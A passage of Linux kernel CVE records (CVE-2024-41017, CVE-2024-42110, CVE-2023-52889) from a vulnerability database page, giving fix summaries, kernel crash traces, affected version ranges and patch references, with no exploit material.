                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.164",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.102",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.43",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.12",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.2",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\njfs: don\u0027t walk off the end of ealist\n\nAdd a check before visiting the members of ea to\nmake sure each ea stays within the ealist."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:37:25.482Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/7f91bd0f2941fa36449ce1a15faaa64f840d9746"
        },
        {
          "url": "https://git.kernel.org/stable/c/fc16776a82e8df97b6c4f9a10ba95aa44cef7ba5"
        },
        {
          "url": "https://git.kernel.org/stable/c/6386f1b6a10e5d1ddd03db4ff6dfc55d488852ce"
        },
        {
          "url": "https://git.kernel.org/stable/c/7e21574195a45fc193555fa40e99fed16565ff7e"
        },
        {
          "url": "https://git.kernel.org/stable/c/4e034f7e563ab723b93a59980e4a1bb33198ece8"
        },
        {
          "url": "https://git.kernel.org/stable/c/17440dbc66ab98b410514b04987f61deedb86751"
        },
        {
          "url": "https://git.kernel.org/stable/c/f4435f476b9bf059cd9e26a69f5b29c768d00375"
        },
        {
          "url": "https://git.kernel.org/stable/c/dbde7bc91093fa9c2410e418b236b70fde044b73"
        },
        {
          "url": "https://git.kernel.org/stable/c/d0fa70aca54c8643248e89061da23752506ec0d4"
        }
      ],
      "title": "jfs: don\u0027t walk off the end of ealist",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41017",
    "datePublished": "2024-07-29T06:37:03.390Z",
    "dateReserved": "2024-07-12T12:17:45.612Z",
    "dateUpdated": "2026-01-05T10:37:25.482Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42110 (GCVE-0-2024-42110)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-11-03 22:01

Title

net: ntb_netdev: Move ntb_netdev_rx_handler() to call netif_rx() from __netif_rx()

Summary

In the Linux kernel, the following vulnerability has been resolved: net: ntb_netdev: Move ntb_netdev_rx_handler() to call netif_rx() from __netif_rx() The following is emitted when using idxd (DSA) dmanegine as the data mover for ntb_transport that ntb_netdev uses. [74412.546922] BUG: using smp_processor_id() in preemptible [00000000] code: irq/52-idxd-por/14526 [74412.556784] caller is netif_rx_internal+0x42/0x130 [74412.562282] CPU: 6 PID: 14526 Comm: irq/52-idxd-por Not tainted 6.9.5 #5 [74412.569870] Hardware name: Intel Corporation ArcherCity/ArcherCity, BIOS EGSDCRB1.E9I.1752.P05.2402080856 02/08/2024 [74412.581699] Call Trace: [74412.584514] <TASK> [74412.586933] dump_stack_lvl+0x55/0x70 [74412.591129] check_preemption_disabled+0xc8/0xf0 [74412.596374] netif_rx_internal+0x42/0x130 [74412.600957] __netif_rx+0x20/0xd0 [74412.604743] ntb_netdev_rx_handler+0x66/0x150 [ntb_netdev] [74412.610985] ntb_complete_rxc+0xed/0x140 [ntb_transport] [74412.617010] ntb_rx_copy_callback+0x53/0x80 [ntb_transport] [74412.623332] idxd_dma_complete_txd+0xe3/0x160 [idxd] [74412.628963] idxd_wq_thread+0x1a6/0x2b0 [idxd] [74412.634046] irq_thread_fn+0x21/0x60 [74412.638134] ? irq_thread+0xa8/0x290 [74412.642218] irq_thread+0x1a0/0x290 [74412.646212] ? __pfx_irq_thread_fn+0x10/0x10 [74412.651071] ? __pfx_irq_thread_dtor+0x10/0x10 [74412.656117] ? __pfx_irq_thread+0x10/0x10 [74412.660686] kthread+0x100/0x130 [74412.664384] ? __pfx_kthread+0x10/0x10 [74412.668639] ret_from_fork+0x31/0x50 [74412.672716] ? __pfx_kthread+0x10/0x10 [74412.676978] ret_from_fork_asm+0x1a/0x30 [74412.681457] </TASK> The cause is due to the idxd driver interrupt completion handler uses threaded interrupt and the threaded handler is not hard or soft interrupt context. However __netif_rx() can only be called from interrupt context. Change the call to netif_rx() in order to allow completion via normal context for dmaengine drivers that utilize threaded irq handling. While the following commit changed from netif_rx() to __netif_rx(), baebdf48c360 ("net: dev: Makes sure netif_rx() can be invoked in any context."), the change should've been a noop instead. However, the code precedes this fix should've been using netif_rx_ni() or netif_rx_any_context().

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/4b3b6c7efee69f077…
	https://git.kernel.org/stable/c/e3af5b14e7632bf12…
	https://git.kernel.org/stable/c/858ae09f03677a4ab…
	https://git.kernel.org/stable/c/e15a5d821e5192a37…

Impacted products

Vendor

Product

Version

Linux

Affected: 548c237c0a9972df5d1afaca38aa733ee577128d , < 4b3b6c7efee69f077b86ef7f088fb96768e46e1f (git)
Affected: 548c237c0a9972df5d1afaca38aa733ee577128d , < e3af5b14e7632bf12058533d69055393e2d126c9 (git)
Affected: 548c237c0a9972df5d1afaca38aa733ee577128d , < 858ae09f03677a4ab907a15516893bc2cc79d4c3 (git)
Affected: 548c237c0a9972df5d1afaca38aa733ee577128d , < e15a5d821e5192a3769d846079bc9aa380139baf (git)

Linux

Affected: 3.9
Unaffected: 0 , < 3.9 (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:45.573Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4b3b6c7efee69f077b86ef7f088fb96768e46e1f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e3af5b14e7632bf12058533d69055393e2d126c9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/858ae09f03677a4ab907a15516893bc2cc79d4c3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e15a5d821e5192a3769d846079bc9aa380139baf"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42110",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:17:32.906742Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:06.779Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ntb_netdev.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "4b3b6c7efee69f077b86ef7f088fb96768e46e1f",
              "status": "affected",
              "version": "548c237c0a9972df5d1afaca38aa733ee577128d",
              "versionType": "git"
            },
            {
              "lessThan": "e3af5b14e7632bf12058533d69055393e2d126c9",
              "status": "affected",
              "version": "548c237c0a9972df5d1afaca38aa733ee577128d",
              "versionType": "git"
            },
            {
              "lessThan": "858ae09f03677a4ab907a15516893bc2cc79d4c3",
              "status": "affected",
              "version": "548c237c0a9972df5d1afaca38aa733ee577128d",
              "versionType": "git"
            },
            {
              "lessThan": "e15a5d821e5192a3769d846079bc9aa380139baf",
              "status": "affected",
              "version": "548c237c0a9972df5d1afaca38aa733ee577128d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ntb_netdev.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.9"
            },
            {
              "lessThan": "3.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ntb_netdev: Move ntb_netdev_rx_handler() to call netif_rx() from __netif_rx()\n\nThe following is emitted when using idxd (DSA) dmanegine as the data\nmover for ntb_transport that ntb_netdev uses.\n\n[74412.546922] BUG: using smp_processor_id() in preemptible [00000000] code: irq/52-idxd-por/14526\n[74412.556784] caller is netif_rx_internal+0x42/0x130\n[74412.562282] CPU: 6 PID: 14526 Comm: irq/52-idxd-por Not tainted 6.9.5 #5\n[74412.569870] Hardware name: Intel Corporation ArcherCity/ArcherCity, BIOS EGSDCRB1.E9I.1752.P05.2402080856 02/08/2024\n[74412.581699] Call Trace:\n[74412.584514]  \u003cTASK\u003e\n[74412.586933]  dump_stack_lvl+0x55/0x70\n[74412.591129]  check_preemption_disabled+0xc8/0xf0\n[74412.596374]  netif_rx_internal+0x42/0x130\n[74412.600957]  __netif_rx+0x20/0xd0\n[74412.604743]  ntb_netdev_rx_handler+0x66/0x150 [ntb_netdev]\n[74412.610985]  ntb_complete_rxc+0xed/0x140 [ntb_transport]\n[74412.617010]  ntb_rx_copy_callback+0x53/0x80 [ntb_transport]\n[74412.623332]  idxd_dma_complete_txd+0xe3/0x160 [idxd]\n[74412.628963]  idxd_wq_thread+0x1a6/0x2b0 [idxd]\n[74412.634046]  irq_thread_fn+0x21/0x60\n[74412.638134]  ? irq_thread+0xa8/0x290\n[74412.642218]  irq_thread+0x1a0/0x290\n[74412.646212]  ? __pfx_irq_thread_fn+0x10/0x10\n[74412.651071]  ? __pfx_irq_thread_dtor+0x10/0x10\n[74412.656117]  ? __pfx_irq_thread+0x10/0x10\n[74412.660686]  kthread+0x100/0x130\n[74412.664384]  ? __pfx_kthread+0x10/0x10\n[74412.668639]  ret_from_fork+0x31/0x50\n[74412.672716]  ? __pfx_kthread+0x10/0x10\n[74412.676978]  ret_from_fork_asm+0x1a/0x30\n[74412.681457]  \u003c/TASK\u003e\n\nThe cause is due to the idxd driver interrupt completion handler uses\nthreaded interrupt and the threaded handler is not hard or soft interrupt\ncontext. However __netif_rx() can only be called from interrupt context.\nChange the call to netif_rx() in order to allow completion via normal\ncontext for dmaengine drivers that utilize threaded irq handling.\n\nWhile the following commit changed from netif_rx() to __netif_rx(),\nbaebdf48c360 (\"net: dev: Makes sure netif_rx() can be invoked in any context.\"),\nthe change should\u0027ve been a noop instead. However, the code precedes this\nfix should\u0027ve been using netif_rx_ni() or netif_rx_any_context()."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:23:13.403Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/4b3b6c7efee69f077b86ef7f088fb96768e46e1f"
        },
        {
          "url": "https://git.kernel.org/stable/c/e3af5b14e7632bf12058533d69055393e2d126c9"
        },
        {
          "url": "https://git.kernel.org/stable/c/858ae09f03677a4ab907a15516893bc2cc79d4c3"
        },
        {
          "url": "https://git.kernel.org/stable/c/e15a5d821e5192a3769d846079bc9aa380139baf"
        }
      ],
      "title": "net: ntb_netdev: Move ntb_netdev_rx_handler() to call netif_rx() from __netif_rx()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42110",
    "datePublished": "2024-07-30T07:46:04.892Z",
    "dateReserved": "2024-07-29T15:50:41.176Z",
    "dateUpdated": "2025-11-03T22:01:45.573Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2023-52889 (GCVE-0-2023-52889)

Vulnerability from cvelistv5 – Published: 2024-08-17 09:08 – Updated: 2025-11-03 21:50

Title

apparmor: Fix null pointer deref when receiving skb during sock creation

Summary

In the Linux kernel, the following vulnerability has been resolved: apparmor: Fix null pointer deref when receiving skb during sock creation The panic below is observed when receiving ICMP packets with secmark set while an ICMP raw socket is being created. SK_CTX(sk)->label is updated in apparmor_socket_post_create(), but the packet is delivered to the socket before that, causing the null pointer dereference. Drop the packet if label context is not set. BUG: kernel NULL pointer dereference, address: 000000000000004c #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: 0000 [#1] PREEMPT SMP NOPTI CPU: 0 PID: 407 Comm: a.out Not tainted 6.4.12-arch1-1 #1 3e6fa2753a2d75925c34ecb78e22e85a65d083df Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 05/28/2020 RIP: 0010:aa_label_next_confined+0xb/0x40 Code: 00 00 48 89 ef e8 d5 25 0c 00 e9 66 ff ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 66 0f 1f 00 0f 1f 44 00 00 89 f0 <8b> 77 4c 39 c6 7e 1f 48 63 d0 48 8d 14 d7 eb 0b 83 c0 01 48 83 c2 RSP: 0018:ffffa92940003b08 EFLAGS: 00010246 RAX: 0000000000000000 RBX: 0000000000000000 RCX: 000000000000000e RDX: ffffa92940003be8 RSI: 0000000000000000 RDI: 0000000000000000 RBP: ffff8b57471e7800 R08: ffff8b574c642400 R09: 0000000000000002 R10: ffffffffbd820eeb R11: ffffffffbeb7ff00 R12: ffff8b574c642400 R13: 0000000000000001 R14: 0000000000000001 R15: 0000000000000000 FS: 00007fb092ea7640(0000) GS:ffff8b577bc00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000000000004c CR3: 00000001020f2005 CR4: 00000000007706f0 PKRU: 55555554 Call Trace: <IRQ> ? __die+0x23/0x70 ? page_fault_oops+0x171/0x4e0 ? exc_page_fault+0x7f/0x180 ? asm_exc_page_fault+0x26/0x30 ? aa_label_next_confined+0xb/0x40 apparmor_secmark_check+0xec/0x330 security_sock_rcv_skb+0x35/0x50 sk_filter_trim_cap+0x47/0x250 sock_queue_rcv_skb_reason+0x20/0x60 raw_rcv+0x13c/0x210 raw_local_deliver+0x1f3/0x250 ip_protocol_deliver_rcu+0x4f/0x2f0 ip_local_deliver_finish+0x76/0xa0 __netif_receive_skb_one_core+0x89/0xa0 netif_receive_skb+0x119/0x170 ? __netdev_alloc_skb+0x3d/0x140 vmxnet3_rq_rx_complete+0xb23/0x1010 [vmxnet3 56a84f9c97178c57a43a24ec073b45a9d6f01f3a] vmxnet3_poll_rx_only+0x36/0xb0 [vmxnet3 56a84f9c97178c57a43a24ec073b45a9d6f01f3a] __napi_poll+0x28/0x1b0 net_rx_action+0x2a4/0x380 __do_softirq+0xd1/0x2c8 __irq_exit_rcu+0xbb/0xf0 common_interrupt+0x86/0xa0 </IRQ> <TASK> asm_common_interrupt+0x26/0x40 RIP: 0010:apparmor_socket_post_create+0xb/0x200 Code: 08 48 85 ff 75 a1 eb b1 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 0f 1f 44 00 00 41 54 <55> 48 89 fd 53 45 85 c0 0f 84 b2 00 00 00 48 8b 1d 80 56 3f 02 48 RSP: 0018:ffffa92940ce7e50 EFLAGS: 00000286 RAX: ffffffffbc756440 RBX: 0000000000000000 RCX: 0000000000000001 RDX: 0000000000000003 RSI: 0000000000000002 RDI: ffff8b574eaab740 RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000 R10: ffff8b57444cec70 R11: 0000000000000000 R12: 0000000000000003 R13: 0000000000000002 R14: ffff8b574eaab740 R15: ffffffffbd8e4748 ? __pfx_apparmor_socket_post_create+0x10/0x10 security_socket_post_create+0x4b/0x80 __sock_create+0x176/0x1f0 __sys_socket+0x89/0x100 __x64_sys_socket+0x17/0x20 do_syscall_64+0x5d/0x90 ? do_syscall_64+0x6c/0x90 ? do_syscall_64+0x6c/0x90 ? do_syscall_64+0x6c/0x90 entry_SYSCALL_64_after_hwframe+0x72/0xdc

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0abe35bc48d4ec804…
	https://git.kernel.org/stable/c/347dcb84a4874b5fb…
	https://git.kernel.org/stable/c/290a6b88e8c19b663…
	https://git.kernel.org/stable/c/ead2ad1d9f045f26f…
	https://git.kernel.org/stable/c/6c920754f62cefc63…
	https://git.kernel.org/stable/c/46c17ead5b7389e22…
	https://git.kernel.org/stable/c/fce09ea314505a52f…

Impacted products

Vendor

Product

Version

Linux

Affected: ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f , < 0abe35bc48d4ec80424b1f4b3560c0e082cbd5c1 (git)
Affected: ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f , < 347dcb84a4874b5fb375092c08d8cc4069b94f81 (git)
Affected: ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f , < 290a6b88e8c19b6636ed1acc733d1458206f7697 (git)
Affected: ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f , < ead2ad1d9f045f26fdce3ef1644913b3a6cd38f2 (git)
Affected: ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f , < 6c920754f62cefc63fccdc38a062c7c3452e2961 (git)
Affected: ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f , < 46c17ead5b7389e22e7dc9903fd0ba865d05bda2 (git)
Affected: ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f , < fce09ea314505a52f2436397608fa0a5d0934fb1 (git)

Linux

Affected: 4.20
Unaffected: 0 , < 4.20 (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.103 , ≤ 6.1.* (semver)
Unaffected: 6.6.44 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-52889",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:11:55.468269Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:31.755Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:50:32.388Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "security/apparmor/lsm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0abe35bc48d4ec80424b1f4b3560c0e082cbd5c1",
              "status": "affected",
              "version": "ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f",
              "versionType": "git"
            },
            {
              "lessThan": "347dcb84a4874b5fb375092c08d8cc4069b94f81",
              "status": "affected",
              "version": "ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f",
              "versionType": "git"
            },
            {
              "lessThan": "290a6b88e8c19b6636ed1acc733d1458206f7697",
              "status": "affected",
              "version": "ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f",
              "versionType": "git"
            },
            {
              "lessThan": "ead2ad1d9f045f26fdce3ef1644913b3a6cd38f2",
              "status": "affected",
              "version": "ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f",
              "versionType": "git"
            },
            {
              "lessThan": "6c920754f62cefc63fccdc38a062c7c3452e2961",
              "status": "affected",
              "version": "ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f",
              "versionType": "git"
            },
            {
              "lessThan": "46c17ead5b7389e22e7dc9903fd0ba865d05bda2",
              "status": "affected",
              "version": "ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f",
              "versionType": "git"
            },
            {
              "lessThan": "fce09ea314505a52f2436397608fa0a5d0934fb1",
              "status": "affected",
              "version": "ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "security/apparmor/lsm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.20"
            },
            {
              "lessThan": "4.20",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.44",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.103",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.44",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\napparmor: Fix null pointer deref when receiving skb during sock creation\n\nThe panic below is observed when receiving ICMP packets with secmark set\nwhile an ICMP raw socket is being created. SK_CTX(sk)-\u003elabel is updated\nin apparmor_socket_post_create(), but the packet is delivered to the\nsocket before that, causing the null pointer dereference.\nDrop the packet if label context is not set.\n\n    BUG: kernel NULL pointer dereference, address: 000000000000004c\n    #PF: supervisor read access in kernel mode\n    #PF: error_code(0x0000) - not-present page\n    PGD 0 P4D 0\n    Oops: 0000 [#1] PREEMPT SMP NOPTI\n    CPU: 0 PID: 407 Comm: a.out Not tainted 6.4.12-arch1-1 #1 3e6fa2753a2d75925c34ecb78e22e85a65d083df\n    Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 05/28/2020\n    RIP: 0010:aa_label_next_confined+0xb/0x40\n    Code: 00 00 48 89 ef e8 d5 25 0c 00 e9 66 ff ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 66 0f 1f 00 0f 1f 44 00 00 89 f0 \u003c8b\u003e 77 4c 39 c6 7e 1f 48 63 d0 48 8d 14 d7 eb 0b 83 c0 01 48 83 c2\n    RSP: 0018:ffffa92940003b08 EFLAGS: 00010246\n    RAX: 0000000000000000 RBX: 0000000000000000 RCX: 000000000000000e\n    RDX: ffffa92940003be8 RSI: 0000000000000000 RDI: 0000000000000000\n    RBP: ffff8b57471e7800 R08: ffff8b574c642400 R09: 0000000000000002\n    R10: ffffffffbd820eeb R11: ffffffffbeb7ff00 R12: ffff8b574c642400\n    R13: 0000000000000001 R14: 0000000000000001 R15: 0000000000000000\n    FS:  00007fb092ea7640(0000) GS:ffff8b577bc00000(0000) knlGS:0000000000000000\n    CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n    CR2: 000000000000004c CR3: 00000001020f2005 CR4: 00000000007706f0\n    PKRU: 55555554\n    Call Trace:\n     \u003cIRQ\u003e\n     ? __die+0x23/0x70\n     ? page_fault_oops+0x171/0x4e0\n     ? exc_page_fault+0x7f/0x180\n     ? asm_exc_page_fault+0x26/0x30\n     ? aa_label_next_confined+0xb/0x40\n     apparmor_secmark_check+0xec/0x330\n     security_sock_rcv_skb+0x35/0x50\n     sk_filter_trim_cap+0x47/0x250\n     sock_queue_rcv_skb_reason+0x20/0x60\n     raw_rcv+0x13c/0x210\n     raw_local_deliver+0x1f3/0x250\n     ip_protocol_deliver_rcu+0x4f/0x2f0\n     ip_local_deliver_finish+0x76/0xa0\n     __netif_receive_skb_one_core+0x89/0xa0\n     netif_receive_skb+0x119/0x170\n     ? __netdev_alloc_skb+0x3d/0x140\n     vmxnet3_rq_rx_complete+0xb23/0x1010 [vmxnet3 56a84f9c97178c57a43a24ec073b45a9d6f01f3a]\n     vmxnet3_poll_rx_only+0x36/0xb0 [vmxnet3 56a84f9c97178c57a43a24ec073b45a9d6f01f3a]\n     